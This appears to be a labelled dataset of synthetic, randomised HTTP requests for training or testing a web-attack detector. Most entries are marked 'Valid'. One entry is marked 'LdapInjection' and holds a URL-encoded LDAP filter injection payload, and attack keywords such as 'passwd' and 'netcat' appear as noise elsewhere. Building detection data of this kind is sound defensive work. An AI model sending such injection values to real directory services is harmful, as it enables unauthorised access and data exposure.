GET /vz.gm0BSXowSrr0R/hf.cfm?neaoelWtdri=nnevhsiorde&n6styleX6=%27u&soaWkthTab=xgnf.JwXFUiO&SjldHpG8-pstc=aOdJ0CU%40PG18&t6=s+e&m4hm1e=aX2o000&rde9=bnA%7Cp6xs%25t&saeecnohhintnhs=62&Bz.bgsound7=erthcta&pMxhnsehwstd0rt=6kBQmDD&smesetmthmuuhnn=560470 HTTP/1.0
Host: 244.3.12.1:4426
Connection: close
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.8, windows-1252;q=0.2, iso-8859-3, shift_jis;q=0.3, x-mac-icelandic;q=0.8
Accept-Encoding: compress, compress
Accept-Language: eGyeyde5-wetmtsa;q=0.5, 4krsnct-a;q=0.2, a13iAe-am;q=0.5, o-enra;q=0.1, 4u-rurpo4lx
Cache-Control: no-store
Client-ip: 17.24.163.68
Cookie: RUi=704
Cookie2: $Version="50"
Date: Sun, 13 Feb 05 01:15:43 GMT
ETag: W/"I@9JJSpa6173tvTd7aQ"
Expect: tHuiic
From: onhejtDe@Otee.be
If-Modified-Since: Mon, 24 Sep 07 09:23:25 GMT
If-Unmodified-Since: Thu, 27 May 04 13:46:54 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 473
MIME-Version: 5.8
Pragma: RgNhoie=taoet955
Proxy-Authorization: tlcn isAue=itnte
Authorization: Basic bmZnbnJzaHQ6WklJc3o=
Referer: http://www.6OWuctd.st/cai2a/lnia/cteclr.js
TE: chunked,deflate,trailers
Trailer: Host
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 4.6; tn-to; rv:7.8.3) Gecko/02333575
UA-OS: Windows 98
Via: 4.5 www.mOoo.shtml, HTTP/6.4 www.sctia.css, neroui/3.5 www.1ni9o.gif
Transfer-Encoding: znote
Upgrade: tlrho/7.0, ipgkmt/5.4, N6tro/0.6, NayNny/6.9
Warning: 266 www.islntI.htm "lalwe" "Thu, 05 Feb 04 01:04:16 UTC"
X-Forwarded-For: 88.70.121.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32352
Start - Id: 31824
class: Valid
GET /eer0sdIlLoewhz2uraN.exe? HTTP/1.1
Host: 84.94.255.89
Connection: nweR
Accept: application/*, image/*;q=0.6
Accept-Charset: shift_jis;q=0.4, x-mac-chinesesimp, koi8, x-mac-chinesesimp
Accept-Encoding: gzip;q=0.6
Accept-Language: yb5-niausi, tji8zeo-tt8re;q=0.0, twtta-4ierdnl;q=0.5, ono-hrmebni
Cache-Control: max-stale=3661
Client-ip: 61.83.163.230
Cookie: nro4no3sosrtjtc=sgnshomeluxbhu;dlogwyDeQ2aRP=mCtr@;ieiazrjEdasax6=0aqcd;oewmrz5p5utAoC=ydPK7TKVBDlH
Cookie2: $Version="836"
Date: Mon, 20 Jun 05 03:27:16 UTC
ETag: W/".gSZqhsoimGkZjX6dhz"
Expect: ptsnay
From: iinTn@uosdcs8h.fr
If-Modified-Since: Wed, 13 May 09 18:35:38 CET
If-Unmodified-Since: Wed, 05 Jul 06 01:18:21 GMT
If-Match: "pjdFxsATnMxi2DlHQ"
If-None-Match: *
If-Range: Sun, 08 Oct 06 22:40:37 CET
Max-Forwards: 2
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic UzRpbnpuOnNhcG5sNXc1
Authorization: Basic T291aWVzejp0eWQ0Zw==
Range: 79-9576,4502-8,7-
Referer: http://www.asenht64.st/wikisa4i/sDg7aie.tar.gz
TE: gzip;q=0.3,gzip;q=0.6
Trailer: Cache-Control
User-Agent: kzdmas
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 540x2072
Via: 7.8 23.68.156.58, ey8/1.8 78.160.189.70, FTP/2.7 35.10.24.70
Transfer-Encoding: ezWr; co0dhyE=4iIh
Upgrade: uwafEE/9.8, tafaoe/7.4, oae/4.1
Warning: 777 www.ddJnowin.js:90 "ihAsi7h3etftaeabder" 
X-Forwarded-For: 145.88.125.113
X-Serial-Number: 829949224403613384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31824
Start - Id: 24578
class: Valid
GET /dOipato0it/VZbgTXenode/sQbFQb-oSyZL4XP1q-Y/1mude/-y2GTincludexJ62Ain/e.IUfLLusPJ99/svC/erdxcdcnidadpRnug/toq0qnwodoaOsiTea2hA/tyZWp1e7t-@Z93y.gif?qqt=tart3Atbbte&pfn4tbssrtzon=0&tort4bewt=eabl%27&ioec6rePit=i-uYXO%40fBJci&ZAHmailSL961SW=740585&A0ddycesn8oeor=78269546&uedItseeaslxn=18168116&xPfromD=eYMimFP&taeuepeu=oe8t13ehe HTTP/1.0
Host: 24.21.251.151
Connection: keep-alive
Accept: application/*, image/jpeg
Accept-Charset: macintosh, hz-gb-2312;q=0.6, x-mac-icelandic, euc-tw;q=0.9, iso-8859-15
Accept-Encoding: identity;q=0.6, compress, gzip;q=0.9, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 76.178.112.222
Cookie: os5ec=53;g6rinlna=lee\;sbwp-nastdingT2Eee=51352;rf=0924142;ttppzd0eT3=est9 
Cookie2: $Version="68"
Date: Wed, 14 Jan 04 19:53:55 CET
ETag: W/"vQad_RvKFgHskRUpwOe"
Expect: 100-continue
From: eCraxq8@s81s.com
If-Modified-Since: Thu, 03 Mar 05 24:27:53 CET
If-Unmodified-Since: Thu, 06 Jul 06 10:08:47 CET
If-Match: "9CFDEcJjpAIko.FLZ"
If-None-Match: "YCS9uM9P_wxWkebH0BB"
If-Range: *
Max-Forwards: 047
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM c2FNbnhPb3M4b2FocmhOaGloY2FhdHRvclRjZWp1WGlOenRpZWNuYmVlZW4=
Authorization: Vssd zafO=shtleazr
Range: 54-217
Referer: http://www.9tciorH.it/auOp5ee/nro74fqG/t8ma/ustiendT.tiff
TE: gzip,deflate,gzip
Trailer: Proxy-Authorization
User-Agent: 3gd0a/2.8
UA-CPU: Sparc
UA-Disp: 6381,2438,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 419x657
Via: 2.9 www.4jonrxh.tiff
Transfer-Encoding: compress
Upgrade: 5Rus/0.8, ttkTi/7.1, ai2/0.9
Warning: 957 68.147.133.230 "jhdseoot" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 34655675046743
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24578
Start - Id: 1505
class: Valid
GET /TzscriptEsy8Ij/gxnY7LUcc97I/rk1SR.swf?LSsez=EeezlwonrN&ta=o&gursy3h6socF=iurtbwouErlN4&ydnsdoenyrrUn=Aeanb&7moOs=63099&cmsnbt3Lt=uyissAbr3ic&2z91=dUQTVq&rIayjblqeTEqEee=alAsaetf9h&ono2nddtye=dc&nrhi=6220003&oi2Esn0c5=mgroup+byrm HTTP/1.0
Host: www.stcgefe4p.it:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.1, compress;q=0.3, deflate;q=0.4, gzip;q=0.0
Accept-Language: 3-eri;q=0.5
Cache-Control: e=Tt
Client-ip: 242.47.145.222
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="3"
Date: Fri, 11 Jan 08 19:52:47 CET
ETag: "2hpiJIqnZpGoazCQc8"
Expect: ysnoei=wEEa;me8t2m=hshs
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Tue, 17 Feb 04 23:48:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 22:03:14 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Jan 07 14:05:05 GMT
Max-Forwards: 108
MIME-Version: 7.1
Pragma: u=7
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: eIrl iD0eim=SnhJN8
Range: 460-9787,-3
Referer: /nreer/ssss.txt
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.5 (Windows; U; WinNT 3.6; dt-ka; rv:0.9.4) Gecko/63260086
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1994x755
Via: 4.1 www.eOiLgis.shtml, 3.8 213.1.207.244, 0.9 2.155.38.156:3964
Transfer-Encoding: identity
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1505
Start - Id: 18786
class: Valid
GET /dmF_RxyV-kQMF.aWm.aspx?onpgw2=f0np%7Cmsa%5Bfr&h6eOmxctt0A=YRsn&keoayepBymn=6suzHl&ulp4t=ni&zoocLAotht1oees=orwgetl&edgro8qeNot=eieIbtahornOq&tnerlyRre=i+vmNt0oacrgs&esCfmduow=4&chtalmujtwqji=enu- HTTP/1.0
Host: www.mygnR.st
Connection: keep-alive
Accept: image/*, audio/*
Accept-Charset: iso-8859-3
Accept-Encoding: *
Accept-Language: go1aeEo-i, t-2yRoaltl, 1dmama-8ariouoi;q=0.7
Cache-Control: de='Mlnslrx'
Client-ip: 61.253.90.162
Cookie: leoRdplaasdEcd=ho
Cookie2: $Version="85"
Date: Sat, 08 Mar 08 19:09:28 UTC
ETag: "915NzLGEFb2FG7Ud@t"
Expect: DrnnfC=othwa
From: ni9cft@w6rom2bfn.de
If-Modified-Since: Tue, 06 Jan 04 13:12:21 GMT
If-Unmodified-Since: Sun, 09 Oct 05 10:49:02 GMT
If-Match: *
If-None-Match: "EsJxFiU0JctPAsx"
If-Range: "tkbWGeerseq5GnRYX"
Max-Forwards: 9
MIME-Version: 5.2
Pragma: cdeas='eh2eitj'
Proxy-Authorization: lzrr ceMeA=gsmut
Authorization: 7tiya itiLmi=3ladas
Range: 23-
Referer: http://irTfZ.biz/ayiuhe.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 3.1; ar-se; rv:0.7.8) Gecko/53376467
UA-CPU: Sparc
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: 1.9 154.16.160.157:71091
Transfer-Encoding: compress
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 003 www.Ooy6hd.tiff "oonlbt8n4cweMttbL" 
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18786
Start - Id: 12967
class: Valid
GET /wttho/dVh6oetattdll/ad8miX/o_sK/xxQ30zevvgK/ogeP.Kai9EilEazKRd/da/eOfXe@uNlJ/temh/raeddhis0slcaEgr/sINTEL7.exe?bLrn=nR+ns7k&atlthIscahte=7302356&tl_myGI=meta5v+Uicam%5Biframe&sgtwr8rwvtsgelm=%2BN&emek=ccgYbos6Lm&eeNd_zy=u+E&egUnaelbboI=Bnswn&plshesEreiZsH=g HTTP/1.1
Host: www.tsana.gov
Connection: hemoths
Accept: text/plain, application/*;q=0.7, text/plain;q=0.3
Accept-Charset: macintosh
Accept-Encoding: *;q=0.5
Accept-Language: 8ss678-en;q=0.6, ih-ftTredd2, s-thhx;q=0.4
Cache-Control: p8lvn=Ref
Client-ip: 99.225.239.171
Cookie: iim=3
Cookie2: $Version="848"
Date: Thu, 01 Sep 05 04:49:23 CET
ETag: "dCDiiY9RB7DsOD7b"
Expect: eSicNis
From: picsvpm@izhyigm.biz
If-Modified-Since: Tue, 21 Mar 06 23:33:29 GMT
If-Unmodified-Since: Wed, 12 Aug 09 16:25:58 CET
If-Match: "bGxmWTXlhmGk9W8pzT"
If-None-Match: *
If-Range: "dwn61ztrg6hHgoG"
Max-Forwards: 804
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: NTLM OWhta2w4blllb2xoa25pc2VpYThob2VnaWRob2VucE5SZWluTQ==
Range: -49,43337-328,4-
Referer: /rhttai/mafSra/beal.txt
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 1.6; is-og; rv:8.0.1) Gecko/56947122
UA-CPU: Sparc
UA-Disp: 1205,305,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 501x762
Via: FTP/5.2 www.TlXiwttn.jpg
Transfer-Encoding: tlanE; gienx=eqamU3e
Upgrade: osnA4i/7.7, iahE/2.8, r1suiw/2.4, ignt/8.2, egc/6.3
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 0390911132263126
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12967
Start - Id: 12875
class: Valid
GET /imoetSeknu/y8Vm5B/passwd4Qf/mII25t/0MDZqunionvIvs2-s/v7nlitnOijel9/ltndcv6nsreasirait/oBkXdzKlEOWN/igkhy4wiLNO4f2sT4l47/hutoocehbnh9xki/mruBpdT/qFj2ACnI1kfzGJzD98a0.asp? HTTP/1.1
Host: www.3tho77ee5.biz:511
Connection: E2Hz
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: p9c7deba-irsOnw;q=0.3
Cache-Control: only-if-cached
Client-ip: 10.235.133.83
Cookie: o8qVn=nk5_q0wsbx;rdhwTFS4k=830685;ieamhfmf=h ess;NjQFtl=o;eusreoqe=E|;sldnbr=7044153
Cookie2: $Version="52"
Date: Tue, 18 Dec 07 08:43:45 GMT
ETag: "5_YVBPvb_8_iXA@up"
Expect: 100-continue
From: dt56@hx2gENt.it
If-Modified-Since: Tue, 14 Aug 07 17:47:58 CET
If-Unmodified-Since: Sun, 17 May 09 20:03:30 GMT
If-Match: *
If-None-Match: *
If-Range: "BS-JrEY6Rafp0B_a"
Max-Forwards: 6346
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: Basic Q3JiMFJlZWU6Zmhib0U=
Range: 35161-,-2,70941-
Referer: http://www.tqitew4.com/oadh.dll
TE: deflate;q=0.1,trailers
Trailer: Referer
User-Agent: st70eCcd0T http://www.cNhrw.org
UA-CPU: StrongARM
UA-Disp: 8359,2395,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6070x3417
Via: FTP/2.9 www.umOnczii.png, 1.3 www.tuyiducr.html:018, bsasoT/1.1 137.224.76.15
Transfer-Encoding: rn7lyA
Upgrade: nni/8.4
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12875
Start - Id: 14282
class: Valid
GET /ni2JE0hwJDPhmVvZhZM/amTtiio0vtTenajo/P4oCcpBBinsertUPKL/tnwSSwKpFvBPQ/6nb/tgeaowYr66.css?esbeLe8atrrz1=812992855&wlns=hHy&nirt=Yh3ei&admueta=-&rlslepm0I2tNr=Cr%3CIl+Irgl8delete8ar&18rdjeeif=homeoidi&mxAHj8=Cofey&ertu=wGC1Z&bsandzceazeasod=59&aucbpdcLineei=aapibody&2nrTNy8ruiit=mienph-an1it%24%40d HTTP/1.0
Host: 243.48.210.236:80
Connection: senhc
Accept: image/jpeg, application/*;q=0.7, video/*
Accept-Charset: x-mac-chinesetrad;q=0.2, windows-1253, iso-2022-jp;q=0.7, x-mac-arabic, windows-1258
Accept-Encoding: 
Accept-Language: ol5hl98r-ncs0r1iE;q=0.6, inntatl-oLi1ihle
Cache-Control: no-store
Client-ip: 12.204.42.238
Cookie: mDnd=dZyZ5C;xlwyt0e37Nwir=i;anakoTlmboitgid=hcafoex6o;gm=ttMoiecbssesdt3r;St5J-K=EiwaiDra3h4execoedfps;gwasaaipo=9630
Cookie2: $Version="20"
Date: Thu, 18 Dec 08 05:55:49 CET
ETag: W/"9LA.bvtOcbMnTrA"
Expect: it2oxet=mnrVt
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Tue, 16 May 06 08:53:01 CET
If-Match: *
If-None-Match: "DoyuPhjUJT3se_FB"
If-Range: *
Max-Forwards: 419
MIME-Version: 7.4
Pragma: rnUuhS=caG
Proxy-Authorization: Digest realm
Authorization: 8swn qBlpni8u=nehe
Range: 118-,169-11
Referer: /e5ceicYi/urqtNb/onxo/e2mq.mpg
TE: trailers,deflate,deflate
Trailer: Transfer-Encoding
User-Agent: tm6rq17Arx http://www.shrtx7st.net
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: 3.9 148.29.64.11, FTP/2.4 44.130.207.11:06
Transfer-Encoding: aaaemm
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 199 12.200.10.76 "ihs6bltiqeexzuo" 
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 0081275585581186032
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14282
Start - Id: 19274
class: Valid
GET /efNNuno78Necsegrc.tiff?6ntJJnki1r=1&e9ssacotr=hbYY&iydte0taddowb=ildo&2hrsasr07mEhsi=96415006&zH_xoE=Se HTTP/1.1
Host: 115.54.131.201
Connection: ig1Hl
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 70.40.223.207
Cookie: deleterK@=puoraasuthsrekf;afilaeihsErti=qiitnthw;m47iAern=iu(29ta)
Cookie2: $Version="0"
Date: Sat, 12 Jan 08 23:24:32 CET
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sun, 18 Dec 05 12:28:59 GMT
If-Unmodified-Since: Mon, 08 Mar 10 21:29:01 CET
If-Match: "@BW9MPVG31fESe2@Fhs"
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: Sat, 18 Dec 04 01:22:51 GMT
Max-Forwards: 82
MIME-Version: 6.0
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: NTLM ZTd0SXRyYW5FZGx0RXRvaGhhc3NtOVRsbHNjZ3ZzVGFub3VDd2hlM2x0cw==
Range: 784688-250,21331-
Referer: /ihew.dll
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 0.5; ws-cf; rv:1.4.0) Gecko/72204183
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3141x1930
Via: FTP/4.9 11.22.49.102, 1.0 152.206.166.162
Transfer-Encoding: deflate
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 9449632282194907610
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19274
Start - Id: 37031
class: LdapInjection
GET /sUrr6Oo1R1K6.asp?asiygh=whmd%29%28++%7C+++%28tevm%3D*%29&hds=98&eaMor=804296025&ewue0rw=sDcato&tteixDrsckoanet=7628846397&zfRsp=a%24uo&onmnOihTl=3re&es4ttAadoothrm=87103018 HTTP/1.1
Host: 154.68.168.164
Connection: keep-alive
Accept: image/*;q=0.9
Accept-Charset: windows-874, us-ascii, koi8-r;q=0.8, x-mac-greek;q=0.3, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: sbo='Rhnnatt'
Client-ip: 142.195.161.161
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="1"
Date: Sun, 18 Feb 07 17:26:57 UTC
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: "3dTQFi5lg15QF-a1M"
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 3033
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://ale3el.cz/zxts/jaic/iq9o/svr3.mpeg
TE: trailers
Trailer: Connection
User-Agent: xresir4b/0.6.2
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/7.1 www.itoyhei.shtml
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37031
Start - Id: 6935
class: Valid
PUT /kv2FCgtzrRVnp/h77x0.5/tDLo2RR7/aisNzcReemon9sSxe/xo3JbJx/wrn0qteeoierdnrohti/nluAYO_./s94nI9ylfl.js? HTTP/1.1
Content-Length: 14
Content-Language: a0nsol,bsvd,e
Content-Encoding: compress
Content-Location: /edm0de/rkr0rE.exe
Content-MD5: dXFmZW9zdHM1MnN5ZXhvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Feb 04 18:05:46 GMT
Last-Modified: Fri, 08 Jul 05 24:34:41 UTC
Host: 168.71.78.8
Connection: close
Accept: video/mpeg;q=0.4, image/gif;q=0.1, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ndeeDci-ea;q=0.3
Cache-Control: min-fresh=3811
Client-ip: 182.144.239.94
Cookie: datergpde=afv7E
Cookie2: $Version="44"
Date: Thu, 02 Jun 05 09:21:49 CET
ETag: "dEUa-f.7nT1NUGyZ"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Wed, 07 Apr 10 15:38:02 CET
If-Unmodified-Since: Wed, 04 Jul 07 02:45:29 UTC
If-Match: *
If-None-Match: *
If-Range: "gVayAy1G_nXhbFbolj"
Max-Forwards: 0
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: obntn ETroq=muk2
Authorization: Basic Ym9UZzo1NG9hYjI=
Range: -35,310954-4,-65030
Referer: /s3ts/iidroDT.jpg
TE: trailers
Trailer: From
User-Agent: sgTIq9@c http://www.mP9nNrc5.gov
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9121x8354
Via: HTTP/9.1 212.73.118.26, 5.5 www.r3tis8r.jpg
Transfer-Encoding: gzip
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

8oyiIcsu=75223

End - Id: 6935
Start - Id: 6044
class: Valid
POST /bwindow.open3etc4/Nilzo2tWritazpa/oiMAUWZTHh2yM@6kGjv@/lF@V0YSH/nIO1pIPgkfJZxd/ul.k.sh? HTTP/1.0
Content-Length: 55
Content-Language: sr6mll2,b
Content-Encoding: gzip
Content-Location: /08lce/tbvshif/SasN9/xiHweL/iontu.nsf
Content-MD5: d1NvZXV0eXRwYWZyYWRvZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Apr 06 16:57:32 CET
Last-Modified: Fri, 07 Dec 07 01:20:26 GMT
Host: 118.213.232.190
Connection: tfoo8a
Accept: audio/basic, audio/x-wav
Accept-Charset: iso-8859-5;q=0.2, x-mac-arabic
Accept-Encoding: 
Accept-Language: aox0N-goan;q=0.1, stc-ls7, rei4oa5b-o;q=0.4, tzgc-iY, e-aiergAcO;q=0.3
Cache-Control: no-cache
Client-ip: 28.235.71.35
Cookie: dn=IcehlDpaD;anvxgnnrow=cHueip1;XJtHTXu7wTzG=ds1T;ctoeRms2=oT-jrH;eaOertsonnonl2=plSlIfhcFtl
Cookie2: $Version="4"
Date: Mon, 11 Feb 08 15:12:13 CET
ETag: "q3jKt1Az16o6EjZ3ol"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Sun, 23 Jul 06 23:37:13 GMT
If-Unmodified-Since: Mon, 05 May 08 10:46:45 UTC
If-Match: *
If-None-Match: "MgJwm1Q.U4aL60IEno."
If-Range: Sun, 19 Sep 04 13:29:33 UTC
Max-Forwards: 962
MIME-Version: 3.9
Pragma: IWd=Iribs
Proxy-Authorization: Basic ZmhyZWNtOnJ0bmE=
Authorization: ea5O Xtbt=ntme
Range: 777-,35698-48172
Referer: http://cnhf.net/owoulrao.tiff
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.8 (Windows; U; WinNT 0.9; yc-nr; rv:0.3.3) Gecko/75090958
UA-CPU: x86
UA-Disp: 2677,507,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 986x885
Via: 1.5 172.128.141.42:8915, 2.5 79.62.114.91:37441, FTP/9.2 www.rteI.shtml
Transfer-Encoding: identity
Upgrade: eeta0n/6.8
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 102.142.185.9
X-Serial-Number: 74978987947334907792
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~

deseNgsieesEti=mps&tic=s latr&nongn=/7idivnledeleteap

End - Id: 6044
Start - Id: 22812
class: Valid
GET /ruCr-A/tTgdcNe9yW/6rraaint32ymaigi8e0d/Vm-zk.swf? HTTP/1.0
Host: www.gk0t.uk
Connection: keep-alive
Accept: application/*
Accept-Charset: x-mac-arabic;q=0.6, euc-tw, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: 5eu9bsi-nCgtIet;q=0.8, ys-iep;q=0.8
Cache-Control: only-if-cached
Client-ip: 173.3.239.168
Cookie: Athi=rh eno[liEon84ddgeH;hyc7nooentaSy1=qlteh1kep;mloolN=Osres(e b%Mh@=u;rsEss7t4=passthru;k2ap=otaT=;hineuIrrO=mdhyeDh2iloe
Cookie2: $Version="210"
Date: Fri, 14 Sep 07 19:15:27 CET
ETag: "dy1SQ24-L8Gq_7JD"
Expect: 100-continue
From: ixeeaea8@ttdinp.org
If-Modified-Since: Wed, 22 Apr 09 12:35:58 CET
If-Unmodified-Since: Tue, 06 Jun 06 03:52:04 GMT
If-Match: "AvuWd2Vv.jSiLenZu"
If-None-Match: *
If-Range: "72eGl73A_DZIS6XyVo"
Max-Forwards: 4401
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic dHRhYW86Tm5hYW51
Range: -637
Referer: /IiRdfnE/0idattdl/fa3htm.tar.gz
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.6 (X11; U; Open BSD i586 0.9; nh-ah; rv:9.4.5) Gecko/60179689
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 3.9 189.147.198.234, 1.4 249.5.27.138, 5.1 14.61.169.38
Transfer-Encoding: compress
Upgrade: nlNDj/4.6
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 8712140
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22812
Start - Id: 34728
class: Valid
PUT /OeEsa.shtml? HTTP/1.1
Content-Length: 185
Content-Language: bdwa
Content-Encoding: identity
Content-Location: http://ssaKl.net/esyePa/uysuoie/amascb/vnataz/wdsi.sh
Content-MD5: dHRkbmV0dGFpY2VlbDZlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:27:19 GMT
Last-Modified: Sun, 09 Sep 07 20:51:45 UTC
Host: 182.114.131.168:6654
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.3, iso-8859-8, x-mac-arabic;q=0.6, big5
Accept-Encoding: 
Accept-Language: vsBr-0rnih7t, aapa-eSwndtmw
Cache-Control: min-fresh=9
Client-ip: 63.100.109.215
Cookie: neyEtopij=nnetcatsncoIbl;lehttpsOiF= brur+:gSdandcuD;ohnoehdjrmfr=silrlgd;
Cookie2: $Version="817"
Date: Mon, 08 Sep 08 14:08:10 CET
ETag: W/"tvaIz-1JxMiRT1iZc"
Expect: 100-continue
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Sun, 24 Feb 08 09:04:11 GMT
If-Unmodified-Since: Sun, 07 May 06 22:56:00 CET
